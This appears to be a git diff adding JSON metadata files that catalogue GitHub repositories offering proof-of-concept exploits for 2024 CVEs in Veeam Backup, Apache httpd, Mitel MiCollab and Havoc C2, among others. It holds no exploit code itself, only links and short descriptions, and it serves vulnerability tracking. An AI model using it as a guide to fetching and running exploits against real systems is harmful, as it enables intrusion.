+] \ No newline at end of file diff --git a/2024/CVE-2024-40711.json b/2024/CVE-2024-40711.json new file mode 100644 index 0000000000..72ca90b053 --- /dev/null +++ b/2024/CVE-2024-40711.json @@ -0,0 +1,95 @@ +[ + { + "id": 857817098, + "name": "CVE-2024-40711", + "full_name": "watchtowrlabs\/CVE-2024-40711", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/CVE-2024-40711", + "description": "Pre-Auth Exploit for CVE-2024-40711", + "fork": false, + "created_at": "2024-09-15T17:25:32Z", + "updated_at": "2024-12-28T12:35:22Z", + "pushed_at": "2024-09-15T17:28:41Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 38, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 873392498, + "name": "CVE-2024-40711-Exp", + "full_name": "realstatus\/CVE-2024-40711-Exp", + "owner": { + "login": "realstatus", + "id": 41789399, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41789399?v=4", + "html_url": "https:\/\/github.com\/realstatus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/realstatus\/CVE-2024-40711-Exp", + "description": "CVE-2024-40711-exp", + "fork": false, + "created_at": "2024-10-16T05:02:27Z", + "updated_at": "2024-12-17T10:12:05Z", + "pushed_at": "2024-10-17T01:06:42Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 37, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892922773, + "name": "cve-2024-40711-poc", + "full_name": "XiaomingX\/cve-2024-40711-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-40711-poc", + "description": "CVE-2024-40711 是 Veeam Backup & Replication 软件中的一个严重漏洞,允许未经身份验证的攻击者远程执行代码。 ", + "fork": false, + "created_at": "2024-11-23T04:02:34Z", + "updated_at": "2024-12-08T18:37:03Z", + "pushed_at": "2024-11-23T04:02:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40725.json b/2024/CVE-2024-40725.json new file mode 100644 index 0000000000..a70719f3dd --- /dev/null +++ b/2024/CVE-2024-40725.json @@ -0,0 +1,95 @@ +[ + { + "id": 830811519, + "name": "CVE-2024-40725-CVE-2024-40898", + "full_name": "TAM-K592\/CVE-2024-40725-CVE-2024-40898", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-40725-CVE-2024-40898", + "description": "CVE-2024-40725 and CVE-2024-40898, affecting Apache HTTP Server versions 2.4.0 through 2.4.61. These flaws pose significant risks to web servers worldwide, potentially leading to source code disclosure and server-side request forgery (SSRF) attacks.", + "fork": false, + "created_at": "2024-07-19T03:51:54Z", + "updated_at": "2025-01-02T11:16:44Z", + "pushed_at": "2024-07-19T04:01:13Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 69, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 886594059, + "name": "CVE-2024-40725-CVE-2024-40898", + "full_name": "whiterose7777\/CVE-2024-40725-CVE-2024-40898", + "owner": { + "login": "whiterose7777", + "id": 174041119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174041119?v=4", + "html_url": "https:\/\/github.com\/whiterose7777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whiterose7777\/CVE-2024-40725-CVE-2024-40898", + "description": null, + "fork": false, + "created_at": "2024-11-11T09:00:22Z", + "updated_at": "2024-11-12T08:52:37Z", + "pushed_at": "2024-11-11T09:01:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 905309278, + "name": "CVE-2024-40725", + "full_name": "soltanali0\/CVE-2024-40725", + "owner": { + "login": "soltanali0", + "id": 87374678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87374678?v=4", + "html_url": "https:\/\/github.com\/soltanali0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soltanali0\/CVE-2024-40725", + "description": "exploit CVE-2024-40725 (Apache httpd) with ", + "fork": false, + "created_at": "2024-12-18T15:09:38Z", + "updated_at": "2024-12-22T22:56:07Z", + "pushed_at": "2024-12-18T15:12:31Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40892.json b/2024/CVE-2024-40892.json new file mode 100644 index 0000000000..ebc0baaa61 --- /dev/null +++ b/2024/CVE-2024-40892.json @@ -0,0 +1,33 @@ +[ + { + "id": 845664521, + "name": "fwbt", + "full_name": "xen0bit\/fwbt", + "owner": { + "login": "xen0bit", + "id": 21974988, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21974988?v=4", + "html_url": "https:\/\/github.com\/xen0bit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xen0bit\/fwbt", + "description": "Proof of Concept code for interaction with Firewalla via Bluetooth Low-Energy and exploitation of CVE-2024-40892 \/ CVE-2024-40893", + "fork": false, + "created_at": "2024-08-21T17:27:21Z", + "updated_at": "2024-11-20T16:31:02Z", + "pushed_at": "2024-08-21T17:35:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41107.json b/2024/CVE-2024-41107.json new file mode 100644 index 0000000000..5696a35c76 --- /dev/null +++ b/2024/CVE-2024-41107.json @@ -0,0 +1,33 @@ +[ + { + "id": 832571304, + "name": "CVE-2024-41107", + "full_name": "d0rb\/CVE-2024-41107", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-41107", + "description": "This repository contains an PoC for the critical vulnerability identified as CVE-2024-41107 in Apache CloudStack", + "fork": false, + "created_at": "2024-07-23T09:39:42Z", + "updated_at": "2024-11-20T16:30:58Z", + "pushed_at": "2024-07-25T13:06:33Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41110.json b/2024/CVE-2024-41110.json new file mode 100644 index 0000000000..25f1ad995a --- /dev/null +++ b/2024/CVE-2024-41110.json @@ -0,0 +1,64 @@ +[ + { + "id": 833515840, + "name": "cve-2024-41110-checker", + "full_name": "vvpoglazov\/cve-2024-41110-checker", + "owner": { + "login": "vvpoglazov", + "id": 123960062, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123960062?v=4", + "html_url": "https:\/\/github.com\/vvpoglazov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vvpoglazov\/cve-2024-41110-checker", + "description": null, + "fork": false, + "created_at": "2024-07-25T08:03:15Z", + "updated_at": "2024-10-03T12:52:43Z", + "pushed_at": "2024-07-25T09:34:33Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834245223, + "name": "CVE-2024-41110-SCAN", + "full_name": "PauloParoPP\/CVE-2024-41110-SCAN", + "owner": { + "login": "PauloParoPP", + "id": 51863323, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51863323?v=4", + "html_url": "https:\/\/github.com\/PauloParoPP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PauloParoPP\/CVE-2024-41110-SCAN", + "description": null, + "fork": false, + "created_at": "2024-07-26T18:41:42Z", + "updated_at": "2024-07-26T19:21:26Z", + "pushed_at": "2024-07-26T19:21:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41276.json b/2024/CVE-2024-41276.json new file mode 100644 index 0000000000..7f762bf720 --- /dev/null +++ b/2024/CVE-2024-41276.json @@ -0,0 +1,33 @@ +[ + { + "id": 825691437, + "name": "CVE-2024-41276", + "full_name": "artemy-ccrsky\/CVE-2024-41276", + "owner": { + "login": "artemy-ccrsky", + "id": 33719402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33719402?v=4", + "html_url": "https:\/\/github.com\/artemy-ccrsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/artemy-ccrsky\/CVE-2024-41276", + "description": null, + "fork": false, + "created_at": "2024-07-08T10:21:34Z", + "updated_at": "2024-12-05T10:52:07Z", + "pushed_at": "2024-07-31T19:24:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41290.json b/2024/CVE-2024-41290.json new file mode 100644 index 0000000000..5df5428d48 --- /dev/null +++ b/2024/CVE-2024-41290.json @@ -0,0 +1,33 @@ +[ + { + "id": 866035036, + "name": "CVE-2024-41290", + "full_name": "paragbagul111\/CVE-2024-41290", + "owner": { + "login": "paragbagul111", + "id": 68190427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68190427?v=4", + "html_url": "https:\/\/github.com\/paragbagul111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paragbagul111\/CVE-2024-41290", + "description": "FlatPress CMS v1.3.1 1.3 was discovered to use insecure methods to > store authentication data", + "fork": false, + "created_at": "2024-10-01T14:35:39Z", + "updated_at": "2024-10-01T14:40:00Z", + "pushed_at": "2024-10-01T14:39:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41301.json b/2024/CVE-2024-41301.json new file mode 100644 index 0000000000..4fb66e1996 --- /dev/null +++ b/2024/CVE-2024-41301.json @@ -0,0 +1,33 @@ +[ + { + "id": 828534593, + "name": "CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting", + "full_name": "patrickdeanramos\/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting", + "owner": { + "login": "patrickdeanramos", + "id": 17971824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17971824?v=4", + "html_url": "https:\/\/github.com\/patrickdeanramos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patrickdeanramos\/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting", + "description": null, + "fork": false, + "created_at": "2024-07-14T12:51:17Z", + "updated_at": "2024-07-30T22:51:54Z", + "pushed_at": "2024-07-30T22:51:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41302.json b/2024/CVE-2024-41302.json new file mode 100644 index 0000000000..2956912c18 --- /dev/null +++ b/2024/CVE-2024-41302.json @@ -0,0 +1,33 @@ +[ + { + "id": 828537636, + "name": "CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection", + "full_name": "patrickdeanramos\/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection", + "owner": { + "login": "patrickdeanramos", + "id": 17971824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17971824?v=4", + "html_url": "https:\/\/github.com\/patrickdeanramos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/patrickdeanramos\/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection", + "description": "Bookea-tu-Mesa is vulnerable to SQL Injection", + "fork": false, + "created_at": "2024-07-14T13:01:36Z", + "updated_at": "2024-07-30T22:53:28Z", + "pushed_at": "2024-07-30T22:53:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41312.json b/2024/CVE-2024-41312.json new file mode 100644 index 0000000000..f9dc7f8849 --- /dev/null +++ b/2024/CVE-2024-41312.json @@ -0,0 +1,33 @@ +[ + { + "id": 847583819, + "name": "CVE-2024-41312.", + "full_name": "Amal264882\/CVE-2024-41312.", + "owner": { + "login": "Amal264882", + "id": 27804408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27804408?v=4", + "html_url": "https:\/\/github.com\/Amal264882", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Amal264882\/CVE-2024-41312.", + "description": "InstantCMS - Stored Cross Site Scripting (XSS)", + "fork": false, + "created_at": "2024-08-26T06:32:49Z", + "updated_at": "2024-08-26T06:45:26Z", + "pushed_at": "2024-08-26T06:45:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41319.json b/2024/CVE-2024-41319.json new file mode 100644 index 0000000000..a5a5943707 --- /dev/null +++ b/2024/CVE-2024-41319.json @@ -0,0 +1,33 @@ +[ + { + "id": 906156712, + "name": "TOTOLINK_poc", + "full_name": "NingXin2002\/TOTOLINK_poc", + "owner": { + "login": "NingXin2002", + "id": 138864342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138864342?v=4", + "html_url": "https:\/\/github.com\/NingXin2002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NingXin2002\/TOTOLINK_poc", + "description": "TOTOLINK A6000R 命令执行漏洞(CVE-2024-41319)", + "fork": false, + "created_at": "2024-12-20T09:31:58Z", + "updated_at": "2024-12-26T16:20:35Z", + "pushed_at": "2024-12-20T09:35:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41570.json b/2024/CVE-2024-41570.json new file mode 100644 index 0000000000..1d51cb1a9d --- /dev/null +++ b/2024/CVE-2024-41570.json @@ -0,0 +1,33 @@ +[ + { + "id": 828329292, + "name": "Havoc-C2-SSRF-poc", + "full_name": "chebuya\/Havoc-C2-SSRF-poc", + "owner": { + "login": "chebuya", + "id": 146861503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4", + "html_url": "https:\/\/github.com\/chebuya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chebuya\/Havoc-C2-SSRF-poc", + "description": "CVE-2024-41570: Havoc C2 0.7 Teamserver SSRF exploit", + "fork": false, + "created_at": "2024-07-13T19:54:27Z", + "updated_at": "2024-12-19T02:47:57Z", + "pushed_at": "2024-09-11T20:00:46Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 36, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41628.json b/2024/CVE-2024-41628.json new file mode 100644 index 0000000000..ba2d4fecd8 --- /dev/null +++ b/2024/CVE-2024-41628.json @@ -0,0 +1,33 @@ +[ + { + "id": 835107342, + "name": "CVE-2024-41628", + "full_name": "Redshift-CyberSecurity\/CVE-2024-41628", + "owner": { + "login": "Redshift-CyberSecurity", + "id": 64486752, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64486752?v=4", + "html_url": "https:\/\/github.com\/Redshift-CyberSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redshift-CyberSecurity\/CVE-2024-41628", + "description": null, + "fork": false, + "created_at": "2024-07-29T07:12:14Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-07-29T13:04:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41640.json b/2024/CVE-2024-41640.json new file mode 100644 index 0000000000..c158568e89 --- /dev/null +++ b/2024/CVE-2024-41640.json @@ -0,0 +1,33 @@ +[ + { + "id": 829873539, + "name": "CVE-2024-41640", + "full_name": "alemusix\/CVE-2024-41640", + "owner": { + "login": "alemusix", + "id": 15678800, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15678800?v=4", + "html_url": "https:\/\/github.com\/alemusix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alemusix\/CVE-2024-41640", + "description": null, + "fork": false, + "created_at": "2024-07-17T07:00:31Z", + "updated_at": "2024-07-27T09:41:00Z", + "pushed_at": "2024-07-17T07:57:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41651.json b/2024/CVE-2024-41651.json new file mode 100644 index 0000000000..826d8ced2b --- /dev/null +++ b/2024/CVE-2024-41651.json @@ -0,0 +1,33 @@ +[ + { + "id": 839965855, + "name": "CVE-2024-41651", + "full_name": "Fckroun\/CVE-2024-41651", + "owner": { + "login": "Fckroun", + "id": 69816382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69816382?v=4", + "html_url": "https:\/\/github.com\/Fckroun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fckroun\/CVE-2024-41651", + "description": "CVE-2024-41651", + "fork": false, + "created_at": "2024-08-08T17:25:30Z", + "updated_at": "2024-08-08T17:26:30Z", + "pushed_at": "2024-08-08T17:26:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41662.json b/2024/CVE-2024-41662.json new file mode 100644 index 0000000000..df0710d487 --- /dev/null +++ b/2024/CVE-2024-41662.json @@ -0,0 +1,33 @@ +[ + { + "id": 832765785, + "name": "CVE-2024-41662", + "full_name": "sh3bu\/CVE-2024-41662", + "owner": { + "login": "sh3bu", + "id": 67383098, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67383098?v=4", + "html_url": "https:\/\/github.com\/sh3bu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sh3bu\/CVE-2024-41662", + "description": "Markdown XSS leads to RCE in VNote version <=3.18.1", + "fork": false, + "created_at": "2024-07-23T17:21:12Z", + "updated_at": "2024-12-29T16:45:04Z", + "pushed_at": "2024-07-24T18:39:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41713.json b/2024/CVE-2024-41713.json new file mode 100644 index 0000000000..600029c95b --- /dev/null +++ b/2024/CVE-2024-41713.json @@ -0,0 +1,95 @@ +[ + { + "id": 898839903, + "name": "Mitel-MiCollab-Auth-Bypass_CVE-2024-41713", + "full_name": "watchtowrlabs\/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713", + "description": null, + "fork": false, + "created_at": "2024-12-05T06:13:57Z", + "updated_at": "2024-12-10T22:43:59Z", + "pushed_at": "2024-12-05T07:55:04Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906475087, + "name": "CVE-2024-41713POC", + "full_name": "zxj-hub\/CVE-2024-41713POC", + "owner": { + "login": "zxj-hub", + "id": 192207002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/192207002?v=4", + "html_url": "https:\/\/github.com\/zxj-hub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zxj-hub\/CVE-2024-41713POC", + "description": "Mitel MiCollab 企业协作平台 任意文件读取漏洞(CVE-2024-41713)由于Mitel MiCollab软件的 NuPoint 统一消息 (NPM) 组件中存在身份验证绕过漏洞,并且输入验证不足,未经身份验证的远程攻击者可利用该漏洞执行路径遍历攻击,成功利用可能导致未授权访问、破坏或删除用户的数据和系统配置。影响范围:version < MiCollab 9.8 SP2 (9.8.2.12)", + "fork": false, + "created_at": "2024-12-21T02:26:26Z", + "updated_at": "2024-12-21T02:28:26Z", + "pushed_at": "2024-12-21T02:28:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906575821, + "name": "cve-2024-CVE-2024-41713", + "full_name": "Sanandd\/cve-2024-CVE-2024-41713", + "owner": { + "login": "Sanandd", + "id": 192220387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/192220387?v=4", + "html_url": "https:\/\/github.com\/Sanandd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sanandd\/cve-2024-CVE-2024-41713", + "description": "cve-2024-CVE-2024-41713", + "fork": false, + "created_at": "2024-12-21T09:35:12Z", + "updated_at": "2024-12-21T09:36:20Z", + "pushed_at": "2024-12-21T09:36:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41958.json b/2024/CVE-2024-41958.json new file mode 100644 index 0000000000..c0b5863e4a --- /dev/null +++ b/2024/CVE-2024-41958.json @@ -0,0 +1,33 @@ +[ + { + "id": 838500653, + "name": "CVE-2024-41958-PoC", + "full_name": "OrangeJuiceHU\/CVE-2024-41958-PoC", + "owner": { + "login": "OrangeJuiceHU", + "id": 30298257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30298257?v=4", + "html_url": "https:\/\/github.com\/OrangeJuiceHU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OrangeJuiceHU\/CVE-2024-41958-PoC", + "description": "This is a small proof of concept for CVE-2024-41958", + "fork": false, + "created_at": "2024-08-05T19:10:08Z", + "updated_at": "2024-08-29T13:31:15Z", + "pushed_at": "2024-08-05T20:22:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-41992.json b/2024/CVE-2024-41992.json new file mode 100644 index 0000000000..d492594255 --- /dev/null +++ b/2024/CVE-2024-41992.json @@ -0,0 +1,33 @@ +[ + { + "id": 846775020, + "name": "CVE-2024-41992-PoC", + "full_name": "fj016\/CVE-2024-41992-PoC", + "owner": { + "login": "fj016", + "id": 117085317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117085317?v=4", + "html_url": "https:\/\/github.com\/fj016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fj016\/CVE-2024-41992-PoC", + "description": "PoC for the CVE-2024-41992 (RCE on devices running WiFi-TestSuite-DUT)", + "fork": false, + "created_at": "2024-08-23T23:48:01Z", + "updated_at": "2024-10-31T08:55:01Z", + "pushed_at": "2024-08-26T07:09:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4231.json b/2024/CVE-2024-4231.json new file mode 100644 index 0000000000..8396a75b2b --- /dev/null +++ b/2024/CVE-2024-4231.json @@ -0,0 +1,33 @@ +[ + { + "id": 816778703, + "name": "Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231", + "full_name": "Redfox-Secuirty\/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231", + "description": null, + "fork": false, + "created_at": "2024-06-18T11:43:23Z", + "updated_at": "2024-06-18T11:43:27Z", + "pushed_at": "2024-06-18T11:43:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4232.json b/2024/CVE-2024-4232.json new file mode 100644 index 0000000000..60fba1863f --- /dev/null +++ b/2024/CVE-2024-4232.json @@ -0,0 +1,64 @@ +[ + { + "id": 816762824, + "name": "Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232", + "full_name": "Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232", + "owner": { + "login": "Redfox-Secuirty", + "id": 173128884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173128884?v=4", + "html_url": "https:\/\/github.com\/Redfox-Secuirty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Redfox-Secuirty\/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232", + "description": null, + "fork": false, + "created_at": "2024-06-18T11:05:06Z", + "updated_at": "2024-06-18T11:05:10Z", + 